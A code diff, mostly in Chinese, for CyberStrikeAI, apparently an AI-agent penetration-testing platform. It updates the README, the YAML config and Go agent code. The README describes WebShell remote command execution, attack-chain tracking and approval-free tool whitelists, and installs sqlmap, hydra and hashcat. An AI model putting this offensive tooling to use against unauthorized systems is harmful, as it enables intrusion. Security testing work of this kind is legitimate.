- 📂 **项目管理**按项目归类对话与漏洞;**共享事实**(项目黑板)在多会话沉淀目标/环境/认证等认知,自动注入 Agent 上下文,支持 MCP 工具读写(`upsert_project_fact``get_project_fact` 等) - 📂 **项目管理**共享事实(黑板)会话沉淀认知,`upsert_project_fact` + `links` 串联攻击路径;聊天攻击链与项目事实图可视化
- 🛡️ 漏洞管理功能:完整的漏洞 CRUD 操作,支持严重程度分级、状态流转、按对话/严重程度/状态过滤,以及统计看板 - 🛡️ 漏洞管理功能:完整的漏洞 CRUD 操作,支持严重程度分级、状态流转、按对话/严重程度/状态过滤,以及统计看板
- 📋 批量任务管理:创建任务队列,批量添加任务,依次顺序执行,支持任务编辑与状态跟踪 - 📋 批量任务管理:创建任务队列,批量添加任务,依次顺序执行,支持任务编辑与状态跟踪
- 🎭 角色化测试:预设安全测试角色(渗透测试、CTF、Web 应用扫描等),支持自定义提示词和工具限制 - 🎭 角色化测试:预设安全测试角色(渗透测试、CTF、Web 应用扫描等),支持自定义提示词和工具限制
- 🧩 **Agent 编排(CloudWeGo Eino****单代理** `POST /api/eino-agent/stream`Eino ADK);**多代理** `POST /api/multi-agent/stream``orchestration`**`deep`** / **`plan_execute`** / **`supervisor`**。`agents/` 下主代理与子代理 Markdown 见 [多代理说明](docs/MULTI_AGENT_EINO.md) - 🧩 **Agent 编排(CloudWeGo Eino****单代理** `POST /api/eino-agent/stream`Eino ADK);**多代理** `POST /api/multi-agent/stream``orchestration`**`deep`** / **`plan_execute`** / **`supervisor`**。ADK **Summarization** 在上下文过长时压缩历史;压缩前将可恢复 **转录** 写入 `data/conversation_artifacts/<会话ID>/summarization/transcript.txt`(保留完整 user/assistant/tool 轮次,省略静态 system)。`agents/` 下主代理与子代理 Markdown 见 [多代理说明](docs/MULTI_AGENT_EINO.md)
- 🖼️ **视觉分析(`analyze_image`**:独立 Vision 模型(如 `qwen-vl-max`),MCP 工具分析本地截图/验证码/UI;图片仅在单次 VL 调用中出现,对话上下文只保留文字摘要。配置见 `config.yaml``vision` 与 [视觉分析说明](docs/VISION.md) - 🖼️ **视觉分析(`analyze_image`**:独立 Vision 模型(如 `qwen-vl-max`),MCP 工具分析本地截图/验证码/UI;图片仅在单次 VL 调用中出现,对话上下文只保留文字摘要。配置见 `config.yaml``vision` 与 [视觉分析说明](docs/VISION.md)
- 🎯 **Skills(面向 Eino 重构)**:技能包放在 **`skills_dir`**,遵循 **Agent Skills** 目录规范(`SKILL.md` + 可选文件);**多代理** 下通过 Eino 官方 **`skill`** 工具 **渐进式披露**(按 name 加载)。**`multi_agent.eino_skills`** 控制是否启用、本机文件/Shell 工具、工具名覆盖;**`eino_middleware`** 可选 patch、tool_search、plantask、reduction、断点目录及 Deep 调参。20+ 领域示例仍可绑定角色 - 🎯 **Skills(面向 Eino 重构)**:技能包放在 **`skills_dir`**,遵循 **Agent Skills** 目录规范(`SKILL.md` + 可选文件);**多代理** 下通过 Eino 官方 **`skill`** 工具 **渐进式披露**(按 name 加载)。**`multi_agent.eino_skills`** 控制是否启用、本机文件/Shell 工具、工具名覆盖;**`eino_middleware`** 可选 patch、tool_search、**plantask**`TaskCreate` / `TaskList` 任务板,落在 `skills_dir/.eino/plantask/`)、reduction、文件型 **checkpoint**`checkpoint_dir`)、ChatModel **重试**、会话 **输出键** 及 Deep 调参。20+ 领域示例仍可绑定角色
- 📱 **机器人**:支持钉钉、飞书长连接,在手机端与 CyberStrikeAI 对话(配置与命令详见 [机器人使用说明](docs/robot.md) - 📱 **机器人**:支持钉钉、飞书长连接,在手机端与 CyberStrikeAI 对话(配置与命令详见 [机器人使用说明](docs/robot.md)
- 🧑‍⚖️ **人机协同(HITL**:对话页侧栏配置协同模式与免审批工具白名单;全局列表在 `config.yaml``hitl.tool_whitelist`;点「应用」可将新增工具合并写入配置文件且**无需重启**即可生效;导航 **人机协同** 页处理待审批工具调用 - 🧑‍⚖️ **人机协同(HITL**:对话页侧栏配置协同模式与免审批工具白名单;全局列表在 `config.yaml``hitl.tool_whitelist`;点「应用」可将新增工具合并写入配置文件且**无需重启**即可生效;导航 **人机协同** 页处理待审批工具调用
- 🐚 **WebShell 管理**:添加与管理 WebShell 连接(兼容冰蝎/蚁剑等),通过虚拟终端执行命令、内置文件管理进行文件操作,并提供按连接维度保存历史的 AI 助手标签页;支持 PHP/ASP/ASPX/JSP 及自定义类型,可配置请求方法与命令参数。 - 🐚 **WebShell 管理**:添加与管理 WebShell 连接(兼容冰蝎/蚁剑等),通过虚拟终端执行命令、内置文件管理进行文件操作,并提供按连接维度保存历史的 AI 助手标签页;支持 PHP/ASP/ASPX/JSP 及自定义类型,可配置请求方法与命令参数。
@@ -189,15 +188,21 @@ chmod +x run.sh && ./run.sh
``` ```
- 或启动前直接编辑 `config.yaml` 文件 - 或启动前直接编辑 `config.yaml` 文件
2. **登录系统** - 使用控制台显示的自动生成密码(或在 `config.yaml` 中设置 `auth.password` 2. **登录系统** - 使用控制台显示的自动生成密码(或在 `config.yaml` 中设置 `auth.password`
3. **安装安全工具(可选)** - 一键安装 `tools/` 目录声明的全部工具 3. **安装安全工具(可选)** - 按需安装 `tools/` 目录中的工具;未安装的工具在执行时会自动跳过或改用替代方案。常用示例
**macOSHomebrew):**
```bash ```bash
./install-tools.sh # 安装缺失工具 (Kali/Debian/Ubuntu 推荐) brew install nmap masscan sqlmap nikto gobuster ffuf hydra hashcat nuclei subfinder
./install-tools.sh --check # 仅检查, 不安装
./install-tools.sh --list # 列出各工具安装状态
./install-tools.sh --only nmap,gau # 只装指定工具
``` ```
macOS 自带 bash 3.2, 请用 `./install-tools.sh --install-bash --list` 自动安装 bash 4+; apt 不可用时会降级到 pip/go/GitHub。
未安装的工具在执行时会自动跳过或改用替代方案。 **LinuxKali / Debian / Ubuntu):**
```bash
sudo apt update
sudo apt install -y nmap masscan sqlmap nikto gobuster hydra hashcat john binwalk
# 部分发行版需自行安装:ffuf、nuclei、subfinder 等可用 go install 或见各工具官网
```
完整工具列表见 `tools/` 目录;各工具安装方式以官方文档为准。
**其他启动方式:** **其他启动方式:**
```bash ```bash
@@ -259,7 +264,7 @@ go build -o cyberstrike-ai cmd/server/main.go
- **预设角色**:系统内置 12+ 个预设的安全测试角色(渗透测试、CTF、Web 应用扫描、API 安全测试、二进制分析、云安全审计等),位于 `roles/` 目录。 - **预设角色**:系统内置 12+ 个预设的安全测试角色(渗透测试、CTF、Web 应用扫描、API 安全测试、二进制分析、云安全审计等),位于 `roles/` 目录。
- **自定义提示词**:每个角色可定义 `user_prompt`,会在用户消息前自动添加,引导 AI 采用特定的测试方法和关注重点。 - **自定义提示词**:每个角色可定义 `user_prompt`,会在用户消息前自动添加,引导 AI 采用特定的测试方法和关注重点。
- **工具限制**:角色可指定 `tools` 列表,限制可用工具,实现聚焦的测试流程(如 CTF 角色限制为 CTF 专用工具)。 - **工具限制**:角色可指定 `tools` 列表,限制可用工具,实现聚焦的测试流程(如 CTF 角色限制为 CTF 专用工具)。
- **Skills**:技能包位于 `skills_dir`;启用 **`multi_agent.eino_skills`** 后,**单代理与多代理**均可通过 Eino **`skill`** 工具按需加载。中间件与本机 read_file/glob/grep 等见文档。 - **Skills**:技能包位于 `skills_dir`;启用 **`multi_agent.eino_skills`** 后,**单代理与多代理**均可通过 Eino **`skill`** 工具按需加载。可选 **`eino_middleware`**tool_search、plantask、reduction、checkpoint、Summarization 转录等)与本机 read_file/glob/grep 等见文档。
- **轻松创建角色**:通过在 `roles/` 目录添加 YAML 文件即可创建自定义角色。每个角色定义 `name`、`description`、`user_prompt`、`icon`、`tools`、`enabled` 字段。 - **轻松创建角色**:通过在 `roles/` 目录添加 YAML 文件即可创建自定义角色。每个角色定义 `name`、`description`、`user_prompt`、`icon`、`tools`、`enabled` 字段。
- **Web 界面集成**:在聊天界面通过下拉菜单选择角色。角色选择会影响 AI 行为和可用工具建议。 - **Web 界面集成**:在聊天界面通过下拉菜单选择角色。角色选择会影响 AI 行为和可用工具建议。
@@ -287,6 +292,7 @@ go build -o cyberstrike-ai cmd/server/main.go
- **子代理****deep** / **supervisor**):其余 `*.md`;标成 orchestrator 的不会进入 `task` 列表。 - **子代理****deep** / **supervisor**):其余 `*.md`;标成 orchestrator 的不会进入 `task` 列表。
- **界面管理****Agents → Agent 管理**API `/api/multi-agent/markdown-agents`。 - **界面管理****Agents → Agent 管理**API `/api/multi-agent/markdown-agents`。
- **配置项**`multi_agent``enabled`、`robot_default_agent_mode`、`batch_use_multi_agent`、`max_iteration`、`plan_execute_loop_max_iterations`、各模式 orchestrator 指令字段、可选 YAML `sub_agents` 与目录合并(同 `id` → Markdown 优先)、**`eino_skills`**、**`eino_middleware`**。 - **配置项**`multi_agent``enabled`、`robot_default_agent_mode`、`batch_use_multi_agent`、`max_iteration`、`plan_execute_loop_max_iterations`、各模式 orchestrator 指令字段、可选 YAML `sub_agents` 与目录合并(同 `id` → Markdown 优先)、**`eino_skills`**、**`eino_middleware`**。
- **长任务与恢复**`checkpoint_dir` 支持进程崩溃后 ADK **断点续跑**(与基于 trace 的「中断继续」不同)。`deep_model_retry_max_retries` 在同一次 LLM 调用内重试瞬时 API 失败。**Summarization** 触发压缩时会写入过滤后的 **transcript**,摘要消息中带路径,模型可用 `read_file` 找回扫描输出等压缩前细节。
- **更多细节**[docs/MULTI_AGENT_EINO.md](docs/MULTI_AGENT_EINO.md)(流式、机器人、批量、中间件差异)。 - **更多细节**[docs/MULTI_AGENT_EINO.md](docs/MULTI_AGENT_EINO.md)(流式、机器人、批量、中间件差异)。
### Skills 技能系统(Agent Skills + Eino ### Skills 技能系统(Agent Skills + Eino
@@ -294,7 +300,7 @@ go build -o cyberstrike-ai cmd/server/main.go
- **运行侧重构****`skills_dir`** 为技能包唯一根目录;**多代理** 通过 Eino 官方 **`skill`** 中间件做 **渐进式披露**(模型按 **name** 调用 `skill`,而非一次性注入全文)。由 **`multi_agent.eino_skills`** 控制:`disable`、`filesystem_tools`(本机读写与 Shell)、`skill_tool_name`。 - **运行侧重构****`skills_dir`** 为技能包唯一根目录;**多代理** 通过 Eino 官方 **`skill`** 中间件做 **渐进式披露**(模型按 **name** 调用 `skill`,而非一次性注入全文)。由 **`multi_agent.eino_skills`** 控制:`disable`、`filesystem_tools`(本机读写与 Shell)、`skill_tool_name`。
- **Eino / 知识流水线**:技能包可切分为 `schema.Document`,供 `FilesystemSkillsRetriever``skills.AsEinoRetriever()`)在 **compose** 图(如索引/编排)中使用。 - **Eino / 知识流水线**:技能包可切分为 `schema.Document`,供 `FilesystemSkillsRetriever``skills.AsEinoRetriever()`)在 **compose** 图(如索引/编排)中使用。
- **HTTP 管理**`/api/skills` 列表与 `depth=summary|full`、`section`、`resource_path` 等仍用于 Web 与运维;**模型侧** 多代理走 **`skill`** 工具,而非 MCP。 - **HTTP 管理**`/api/skills` 列表与 `depth=summary|full`、`section`、`resource_path` 等仍用于 Web 与运维;**模型侧** 多代理走 **`skill`** 工具,而非 MCP。
- **可选 `eino_middleware`**:如 `tool_search`(动态工具列表)、`patch_tool_calls`、`plantask`(结构化任务;默认落在 `skills_dir` 下子目录)、`reduction`、`checkpoint_dir`、Deep 输出键 / 模型重试 / task 描述前缀等,见 `config.yaml` 与 `internal/config/config.go`。 - **可选 `eino_middleware`**:如 `tool_search`(动态工具列表)、`patch_tool_calls`、**`plantask`**Eino `TaskCreate` / `TaskGet` / `TaskUpdate` / `TaskList`JSON 存于 `skills_dir/.eino/plantask/<会话ID>/`**全部**任务标为 completed 后 Eino 会清理任务文件)、`reduction`、**`checkpoint_dir`**(如 `data/eino-checkpoints/`)、**`deep_model_retry_max_retries`**、**`deep_output_key`**、task 描述前缀等,见 `config.yaml` 与 `internal/config/config.go`。
- **自带示例**`skills/cyberstrike-eino-demo/`;说明见 `skills/README.md`。 - **自带示例**`skills/cyberstrike-eino-demo/`;说明见 `skills/README.md`。
**新建技能:** **新建技能:**
@@ -304,7 +310,7 @@ go build -o cyberstrike-ai cmd/server/main.go
### 工具编排与扩展 ### 工具编排与扩展
- `tools/*.yaml` 定义命令、参数、提示词与元数据,可热加载。 - `tools/*.yaml` 定义命令、参数、提示词与元数据,可热加载。
- `security.tools_dir` 指向目录即可批量启用;仍支持在主配置里内联定义。 - `security.tools_dir` 指向目录即可批量启用;仍支持在主配置里内联定义。
- **大结果分页**:超过 200KB 的输出会保存为附件,可通过 `query_execution_result` 工具分页、过滤、正则检索 - **大工具输出**:超过 `reduction_max_length_for_trunc` 时由 Eino reduction 摘要,完整内容落盘至 `tmp/reduction/`;按 `<persisted-output>` 中的路径用 `read_file` 读取
- **结果压缩/摘要**:多兆字节日志可先压缩或生成摘要再写入 SQLite,减小档案体积。 - **结果压缩/摘要**:多兆字节日志可先压缩或生成摘要再写入 SQLite,减小档案体积。
**自定义工具的一般步骤** **自定义工具的一般步骤**
@@ -542,7 +548,12 @@ multi_agent:
orchestrator_instruction: "" # Deeporchestrator.md 正文为空时使用 orchestrator_instruction: "" # Deeporchestrator.md 正文为空时使用
# orchestrator_instruction_plan_execute / orchestrator_instruction_supervisor 可选 # orchestrator_instruction_plan_execute / orchestrator_instruction_supervisor 可选
# eino_skills: { disable: false, filesystem_tools: true, skill_tool_name: skill } # eino_skills: { disable: false, filesystem_tools: true, skill_tool_name: skill }
# eino_middleware: 可选 patch_tool_calls、tool_search、plantask、reduction、checkpoint_dir # eino_middleware: plantask_enable、checkpoint_dir、deep_model_retry_max_retries、deep_output_key
project:
enabled: true # 启用项目黑板与事实 MCP 工具
fact_index_max_runes: 65000
fact_summary_max_runes: 24000
default_inject_deprecated: false
``` ```
### 工具模版示例(`tools/nmap.yaml` ### 工具模版示例(`tools/nmap.yaml`
-19
View File
@@ -5,7 +5,6 @@ import (
"cyberstrike-ai/internal/logger" "cyberstrike-ai/internal/logger"
"cyberstrike-ai/internal/mcp" "cyberstrike-ai/internal/mcp"
"cyberstrike-ai/internal/security" "cyberstrike-ai/internal/security"
"cyberstrike-ai/internal/storage"
"flag" "flag"
"fmt" "fmt"
"os" "os"
@@ -33,23 +32,6 @@ func main() {
// 创建安全工具执行器 // 创建安全工具执行器
executor := security.NewExecutor(&cfg.Security, mcpServer, log.Logger) executor := security.NewExecutor(&cfg.Security, mcpServer, log.Logger)
// 初始化结果存储(与 internal/app/app.go 同样的逻辑)。
// stdio 模式下原本不初始化,导致 'exec' 等查询型工具报"结果存储未初始化"。
resultStorageDir := "tmp"
if cfg.Agent.ResultStorageDir != "" {
resultStorageDir = cfg.Agent.ResultStorageDir
}
if err := os.MkdirAll(resultStorageDir, 0755); err != nil {
fmt.Fprintf(os.Stderr, "创建结果存储目录失败: %v\n", err)
os.Exit(1)
}
resultStorage, err := storage.NewFileResultStorage(resultStorageDir, log.Logger)
if err != nil {
fmt.Fprintf(os.Stderr, "初始化结果存储失败: %v\n", err)
os.Exit(1)
}
executor.SetResultStorage(resultStorage)
// 注册工具 // 注册工具
executor.RegisterTools(mcpServer) executor.RegisterTools(mcpServer)
@@ -61,4 +43,3 @@ func main() {
os.Exit(1) os.Exit(1)
} }
} }
+16 -13
View File
@@ -10,7 +10,7 @@
# ============================================ # ============================================
# 前端显示的版本号(可选,不填则显示默认版本) # 前端显示的版本号(可选,不填则显示默认版本)
version: "v1.6.34" version: "v1.6.44"
# 服务器配置 # 服务器配置
server: server:
host: 0.0.0.0 # 监听地址,0.0.0.0 表示监听所有网络接口 host: 0.0.0.0 # 监听地址,0.0.0.0 表示监听所有网络接口
@@ -40,6 +40,9 @@ audit:
retention_days: 15 # 0 表示不自动清理 retention_days: 15 # 0 表示不自动清理
max_detail_bytes: 8192 max_detail_bytes: 8192
auth_failure_cooldown_seconds: 60 # 同一 IP 登录/改密失败审计最短间隔(秒);未配置时默认 60;-1 关闭节流 auth_failure_cooldown_seconds: 60 # 同一 IP 登录/改密失败审计最短间隔(秒);未配置时默认 60;-1 关闭节流
# MCP 状态监控执行记录保留(tool_executions 表)
monitor:
retention_days: 90 # 省略时默认 90;0 表示不自动清理
# ============================================ # ============================================
# 对话相关配置 # 对话相关配置
# ============================================ # ============================================
@@ -58,7 +61,7 @@ openai:
api_key: sk-xxxxxxx # API 密钥(必填) api_key: sk-xxxxxxx # API 密钥(必填)
model: qwen3-max # 模型名称(必填) model: qwen3-max # 模型名称(必填)
max_total_tokens: 120000 # LLM 相关上下文的最大 Token 数限制(内存压缩和攻击链构建会共用此配置) max_total_tokens: 120000 # LLM 相关上下文的最大 Token 数限制(内存压缩和攻击链构建会共用此配置)
# Eino 路径模型推理:DeepSeek/OpenAI 为 thinking / reasoning_effort 等;provider 为 claude 时合并为 Anthropic 顶层 thinkingextended thinking),mode: off 关闭 # Eino 路径模型推理:DeepSeek/OpenAI 为 thinking / reasoning_effortClaude 4.6+ 为 adaptive + output_config.effort(仅显式配置 effort 时下发);3.7 为 enabled+budget_tokens:10000(文档示例),effort 不映射,自定义预算用 extra_request_fields
reasoning: reasoning:
mode: on # auto | on | offoff 时不附加任何推理扩展字段 mode: on # auto | on | offoff 时不附加任何推理扩展字段
effort: high # low | medium | high | max | xhigh(最高档:OpenAI 常用 xhigh,部分网关用 max,原样下发);空表示不指定 effort: high # low | medium | high | max | xhigh(最高档:OpenAI 常用 xhigh,部分网关用 max,原样下发);空表示不指定
@@ -92,8 +95,6 @@ fofa:
# 达到最大迭代次数时,AI 会自动总结测试结果 # 达到最大迭代次数时,AI 会自动总结测试结果
agent: agent:
max_iterations: 12000 # 全局最大迭代次数(单代理 / Deep / Supervisor / Plan-Execute 主执行器 / 子代理均沿用;agents/*.md 中 max_iterations>0 可单独覆盖) max_iterations: 12000 # 全局最大迭代次数(单代理 / Deep / Supervisor / Plan-Execute 主执行器 / 子代理均沿用;agents/*.md 中 max_iterations>0 可单独覆盖)
large_result_threshold: 102400 # 大结果阈值(字节),默认50KB,超过此大小会自动保存到存储
result_storage_dir: tmp # 结果存储目录,大结果会保存在此目录下
tool_timeout_minutes: 60 # 单次工具执行最大时长(分钟),超时自动终止;0 表示不限制(不推荐,易出现长时间挂起) tool_timeout_minutes: 60 # 单次工具执行最大时长(分钟),超时自动终止;0 表示不限制(不推荐,易出现长时间挂起)
# system_prompt_path: prompts/single-agent.md # 可选:单代理系统提示文件(相对本配置文件所在目录);非空且可读时替换内置提示 # system_prompt_path: prompts/single-agent.md # 可选:单代理系统提示文件(相对本配置文件所在目录);非空且可读时替换内置提示
@@ -129,8 +130,8 @@ multi_agent:
tool_search_min_tools: 20 # 达到该数量才启用 tool_search(避免工具很少时多此一举);与 always_visible 配合使用 tool_search_min_tools: 20 # 达到该数量才启用 tool_search(避免工具很少时多此一举);与 always_visible 配合使用
tool_search_always_visible: 12 # 始终直接暴露给模型的工具个数(顺序与角色工具列表一致);其余工具进入动态池,需 tool_search 解锁 tool_search_always_visible: 12 # 始终直接暴露给模型的工具个数(顺序与角色工具列表一致);其余工具进入动态池,需 tool_search 解锁
tool_search_always_visible_tools: [read_file, glob, grep, analyze_image, write_file, edit_file, execute, task, transfer_to_agent, exit, write_todos, skill, tool_search, TaskCreate, TaskGet, TaskUpdate, TaskList, record_vulnerability, list_vulnerabilities, get_vulnerability, list_knowledge_risk_types, search_knowledge_base, webshell_exec, webshell_file_list, webshell_file_read, webshell_file_write, manage_webshell_list, manage_webshell_add, manage_webshell_update, manage_webshell_delete, manage_webshell_test, batch_task_list, batch_task_get, batch_task_start, batch_task_rerun, batch_task_pause, batch_task_update_metadata, batch_task_update_schedule, batch_task_schedule_enabled, batch_task_update_task, batch_task_remove_task, batch_task_delete, batch_task_create, batch_task_add_task, http-framework-test] # 后端内置常驻工具白名单(优先于 always_visible 数量策略) tool_search_always_visible_tools: [read_file, glob, grep, analyze_image, write_file, edit_file, execute, task, transfer_to_agent, exit, write_todos, skill, tool_search, TaskCreate, TaskGet, TaskUpdate, TaskList, record_vulnerability, list_vulnerabilities, get_vulnerability, list_knowledge_risk_types, search_knowledge_base, webshell_exec, webshell_file_list, webshell_file_read, webshell_file_write, manage_webshell_list, manage_webshell_add, manage_webshell_update, manage_webshell_delete, manage_webshell_test, batch_task_list, batch_task_get, batch_task_start, batch_task_rerun, batch_task_pause, batch_task_update_metadata, batch_task_update_schedule, batch_task_schedule_enabled, batch_task_update_task, batch_task_remove_task, batch_task_delete, batch_task_create, batch_task_add_task, http-framework-test] # 后端内置常驻工具白名单(优先于 always_visible 数量策略)
plantask_enable: false # true:主代理(Deep / Supervisor 主)挂载 TaskCreate/Get/Update/List;需 eino_skills 可用且 skills_dir 存在,否则仅打日志并跳过 plantask_enable: true # P0:主代理挂载 TaskCreate/Get/Update/List 结构化任务板;需 eino_skills 可用且 skills_dir 存在
plantask_rel_dir: .eino/plantask # 结构化任务文件相对 skills_dir 的子目录,其下再按会话 ID 分子目录存放 plantask_rel_dir: .eino/plantask # 任务文件相对 skills_dir,按会话分子目录:skills/.eino/plantask/<conversationId>/
reduction_enable: true # true:大工具输出截断/落盘以控上下文;依赖与 plantask 相同的 eino local 写盘后端,无后端时不挂载 reduction_enable: true # true:大工具输出截断/落盘以控上下文;依赖与 plantask 相同的 eino local 写盘后端,无后端时不挂载
reduction_max_length_for_trunc: 50000 # 单条工具结果超过该字符数(bytes)时截断并落盘(由 reduction 中间件处理) reduction_max_length_for_trunc: 50000 # 单条工具结果超过该字符数(bytes)时截断并落盘(由 reduction 中间件处理)
reduction_max_tokens_for_clear: 160000 # 历史工具结果清理阈值(tokens),超阈值时在模型调用前清理旧结果 reduction_max_tokens_for_clear: 160000 # 历史工具结果清理阈值(tokens),超阈值时在模型调用前清理旧结果
@@ -143,11 +144,11 @@ multi_agent:
plan_execute_executed_steps_budget_ratio: 0.2 # plan_execute 中 executed_steps 预算比例 plan_execute_executed_steps_budget_ratio: 0.2 # plan_execute 中 executed_steps 预算比例
plan_execute_max_step_result_runes: 4000 # plan_execute 每步结果最大字符数(超出截断) plan_execute_max_step_result_runes: 4000 # plan_execute 每步结果最大字符数(超出截断)
plan_execute_keep_last_steps: 8 # plan_execute 仅保留最近 N 步正文,早期步骤折叠为标题 plan_execute_keep_last_steps: 8 # plan_execute 仅保留最近 N 步正文,早期步骤折叠为标题
checkpoint_dir: "" # 非空:为 adk.NewRunner 启用按会话子目录的文件型 CheckPointStore,便于中断恢复持久化;Resume 的 HTTP/前端流程需另行对接 checkpoint_dir: data/eino-checkpoints # P0:进程崩溃/OOM 后同会话自动 ADK Resume;正常结束会删 .ckpt;与「中断并继续」(last_react_*) 是两套机制
run_retry_max_attempts: 0 # >0429/5xx/网络抖动时 ADK 运行循环指数退避续跑次数0=默认 10 run_retry_max_attempts: 0 # 429/5xx/网络抖动时可退避重试次数(run loop + summarization 共用 isEinoTransientRunError0=默认 10
run_retry_max_backoff_sec: 0 # 单次退避上限秒数;0=默认 30 run_retry_max_backoff_sec: 0 # 单次退避上限秒数;0=默认 30
deep_output_key: "" # 非空:将最终助手输出写入 adk session 的键名(DeepSupervisor 主代理);空表示不写入 deep_output_key: final_answer # P0Eino session 写入最终助手结论(框架内部;Deep/Supervisor 主/eino_single
deep_model_retry_max_retries: 0 # >0ChatModel 调用失败时的框架级最大重试次数(Deep 与 Supervisor 主);0:不重试 deep_model_retry_max_retries: 0 # 已废弃,请用 run_retry_max_attempts;保留字段仅为兼容旧配置
task_tool_description_prefix: "" # 非空:仅 Deep 的 task 工具使用自定义描述前缀,运行时会拼接子代理名称;空则走 Eino 默认生成逻辑 task_tool_description_prefix: "" # 非空:仅 Deep 的 task 工具使用自定义描述前缀,运行时会拼接子代理名称;空则走 Eino 默认生成逻辑
# Eino callbacks + OpenTelemetry:框架级 span(与 Zap 对齐);默认不向终端用户 UI 推 eino_trace_*(见 sse_trace_to_client # Eino callbacks + OpenTelemetry:框架级 span(与 Zap 对齐);默认不向终端用户 UI 推 eino_trace_*(见 sse_trace_to_client
eino_callbacks: eino_callbacks:
@@ -310,7 +311,9 @@ roles_dir: roles # 角色配置文件目录(相对于配置文件所在目录
project: project:
enabled: true enabled: true
# default_project_id: "" # 可选:机器人/批量任务创建对话时的默认项目 ID # default_project_id: "" # 可选:机器人/批量任务创建对话时的默认项目 ID
fact_index_max_runes: 6500 fact_index_max_runes: 65000
fact_summary_max_runes: 2400 # 事实关系速览段预算(从索引总预算中预留)
fact_index_path_max_runes: 10000
fact_summary_max_runes: 24000
default_inject_deprecated: false default_inject_deprecated: false
Binary file not shown.

Before

Width:  |  Height:  |  Size: 726 KiB

After

Width:  |  Height:  |  Size: 941 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 262 KiB

After

Width:  |  Height:  |  Size: 179 KiB

-1064
View File
File diff suppressed because it is too large Load Diff
+17 -135
View File
@@ -18,7 +18,6 @@ import (
"cyberstrike-ai/internal/mcp" "cyberstrike-ai/internal/mcp"
"cyberstrike-ai/internal/mcp/builtin" "cyberstrike-ai/internal/mcp/builtin"
"cyberstrike-ai/internal/openai" "cyberstrike-ai/internal/openai"
"cyberstrike-ai/internal/storage"
"go.uber.org/zap" "go.uber.org/zap"
) )
@@ -32,8 +31,6 @@ type Agent struct {
externalMCPMgr *mcp.ExternalMCPManager // 外部MCP管理器 externalMCPMgr *mcp.ExternalMCPManager // 外部MCP管理器
logger *zap.Logger logger *zap.Logger
maxIterations int maxIterations int
resultStorage ResultStorage // 结果存储
largeResultThreshold int // 大结果阈值(字节)
mu sync.RWMutex // 添加互斥锁以支持并发更新 mu sync.RWMutex // 添加互斥锁以支持并发更新
toolNameMapping map[string]string // 工具名称映射:OpenAI格式 -> 原始格式(用于外部MCP工具) toolNameMapping map[string]string // 工具名称映射:OpenAI格式 -> 原始格式(用于外部MCP工具)
currentConversationID string // 当前对话ID(用于自动传递给工具) currentConversationID string // 当前对话ID(用于自动传递给工具)
@@ -41,18 +38,6 @@ type Agent struct {
toolDescriptionMode string // 工具描述模式: "short" | "full",默认 short toolDescriptionMode string // 工具描述模式: "short" | "full",默认 short
} }
// ResultStorage 结果存储接口(直接使用 storage 包的类型)
type ResultStorage interface {
SaveResult(executionID string, toolName string, result string) error
GetResult(executionID string) (string, error)
GetResultPage(executionID string, page int, limit int) (*storage.ResultPage, error)
SearchResult(executionID string, keyword string, useRegex bool) ([]string, error)
FilterResult(executionID string, filter string, useRegex bool) ([]string, error)
GetResultMetadata(executionID string) (*storage.ResultMetadata, error)
GetResultPath(executionID string) string
DeleteResult(executionID string) error
}
type agentConversationIDKey struct{} type agentConversationIDKey struct{}
func withAgentConversationID(ctx context.Context, id string) context.Context { func withAgentConversationID(ctx context.Context, id string) context.Context {
@@ -83,26 +68,6 @@ func NewAgent(cfg *config.OpenAIConfig, agentCfg *config.AgentConfig, mcpServer
maxIterations = 30 maxIterations = 30
} }
// 设置大结果阈值,默认50KB
largeResultThreshold := 50 * 1024
if agentCfg != nil && agentCfg.LargeResultThreshold > 0 {
largeResultThreshold = agentCfg.LargeResultThreshold
}
// 设置结果存储目录,默认tmp
resultStorageDir := "tmp"
if agentCfg != nil && agentCfg.ResultStorageDir != "" {
resultStorageDir = agentCfg.ResultStorageDir
}
// 初始化结果存储
var resultStorage ResultStorage
if resultStorageDir != "" {
// 导入storage包(避免循环依赖,使用接口)
// 这里需要在实际使用时初始化
// 暂时设为nil,在需要时初始化
}
// 配置HTTP Transport,优化连接管理和超时设置 // 配置HTTP Transport,优化连接管理和超时设置
transport := &http.Transport{ transport := &http.Transport{
DialContext: (&net.Dialer{ DialContext: (&net.Dialer{
@@ -133,20 +98,11 @@ func NewAgent(cfg *config.OpenAIConfig, agentCfg *config.AgentConfig, mcpServer
externalMCPMgr: externalMCPMgr, externalMCPMgr: externalMCPMgr,
logger: logger, logger: logger,
maxIterations: maxIterations, maxIterations: maxIterations,
resultStorage: resultStorage,
largeResultThreshold: largeResultThreshold,
toolNameMapping: make(map[string]string), // 初始化工具名称映射 toolNameMapping: make(map[string]string), // 初始化工具名称映射
toolDescriptionMode: "short", toolDescriptionMode: "short",
} }
} }
// SetResultStorage 设置结果存储(用于避免循环依赖)
func (a *Agent) SetResultStorage(storage ResultStorage) {
a.mu.Lock()
defer a.mu.Unlock()
a.resultStorage = storage
}
// SetPromptBaseDir 设置单代理 system_prompt_path 相对路径的基准目录(一般为 config.yaml 所在目录)。 // SetPromptBaseDir 设置单代理 system_prompt_path 相对路径的基准目录(一般为 config.yaml 所在目录)。
func (a *Agent) SetPromptBaseDir(dir string) { func (a *Agent) SetPromptBaseDir(dir string) {
a.mu.Lock() a.mu.Lock()
@@ -663,46 +619,6 @@ func (a *Agent) executeToolViaMCP(ctx context.Context, toolName string, args map
} }
resultStr := resultText.String() resultStr := resultText.String()
resultSize := len(resultStr)
// 检测大结果并保存
a.mu.RLock()
threshold := a.largeResultThreshold
storage := a.resultStorage
a.mu.RUnlock()
if resultSize > threshold && storage != nil {
// 异步保存大结果
go func() {
if err := storage.SaveResult(executionID, toolName, resultStr); err != nil {
a.logger.Warn("保存大结果失败",
zap.String("executionID", executionID),
zap.String("toolName", toolName),
zap.Error(err),
)
} else {
a.logger.Info("大结果已保存",
zap.String("executionID", executionID),
zap.String("toolName", toolName),
zap.Int("size", resultSize),
)
}
}()
// 返回最小化通知
lines := strings.Split(resultStr, "\n")
filePath := ""
if storage != nil {
filePath = storage.GetResultPath(executionID)
}
notification := a.formatMinimalNotification(executionID, toolName, resultSize, len(lines), filePath)
return &ToolExecutionResult{
Result: notification,
ExecutionID: executionID,
IsError: result != nil && result.IsError,
}, nil
}
return &ToolExecutionResult{ return &ToolExecutionResult{
Result: resultStr, Result: resultStr,
@@ -711,57 +627,6 @@ func (a *Agent) executeToolViaMCP(ctx context.Context, toolName string, args map
}, nil }, nil
} }
// formatMinimalNotification 格式化最小化通知
